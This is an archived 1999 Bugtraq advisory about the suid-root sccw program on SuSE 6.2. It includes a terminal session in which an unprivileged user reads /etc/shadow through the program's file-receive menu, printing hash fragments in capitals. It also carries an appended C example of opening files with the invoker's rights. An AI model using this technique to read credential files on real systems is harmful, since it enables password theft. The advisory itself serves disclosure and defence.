[11935] in bugtraq


SuSE 6.2 /usr/bin/sccw read any file

daemon@ATHENA.MIT.EDU (Brock Tellier)
Fri Sep 17 04:07:18 1999

Message-Id:  <043101bf00a3$8088c720$3177a8c0@webley>
Date:         Thu, 16 Sep 1999 19:28:02 -0500
Reply-To: Brock Tellier <btellier@WEBLEY.COM>
From: Brock Tellier <btellier@WEBLEY.COM>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Greetings,

    /usr/bin/sccw, suid root by default on SuSE 6.2, allows any user to
read any file on the system.  Sort of.  Well, it's enough to read the
text of almost anything.  In capitals.  Without punctuation.  Check it
out:

xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > sccw
==========================================================
Soundcard CW for Linux  v1.1  Steven J. Merrifield, VK3ESM
==========================================================
1. Set the speed, currently = 10
2. Set the frequency, currently = 700
3. Set the volume, currently = 32
4. Set the delay value, currently = 3
5. Set the character set for random groups, currently = 1
6. Set the number of groups, currently = 5
7. Receive random character groups.
8. Receive a file.
9. QUIT
==========================================================
Enter your choice : 8
Enter filename : /etc/shadow
ROOTFGPZNZWZ5GWRG10850010000
BIN8902010000
DAEMON8902010000
... etc.

The printing of these lines takes a few seconds each, so be patient.
While you're waiting, remove the suid-bit.
Of course, getting the /etc/shadow file in all caps isn't instant root,
but it's a start for someone out there.  Besides, he can still read your
mail in all caps, without punctuation.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
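
Added example, not part of the original post and not sccw's own code: one way a set-uid program can open a user-named file with the invoking user's rights, so a "receive a file" style prompt cannot read files like /etc/shadow. The function name open_as_invoker and the assumption that privilege is needed again afterwards are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Open a user-supplied path with the invoking user's rights instead of
 * the set-uid owner's. Returns a read-only fd, or -1 with errno set. */
int open_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;

    /* Drop the group first: changing it still needs the privileged euid. */
    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        return -1;
    /* Fail closed if the effective ids are not the real ids now. */
    if (geteuid() != getuid() || getegid() != getgid()) {
        errno = EPERM;
        return -1;
    }

    fd = open(path, O_RDONLY | O_NOCTTY);  /* checked against invoker's ids */
    saved_errno = errno;

    /* Assumption: privilege is needed again later (e.g. for the sound
     * device), so restore it; otherwise drop it for good with setuid(). */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/etc/shadow";
    int fd = open_as_invoker(path);

    if (fd < 0) {
        perror(path);   /* ordinary users get "Permission denied" here */
        return 1;
    }
    printf("%s opened as uid %d\n", path, (int)getuid());
    close(fd);
    return 0;
}
```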
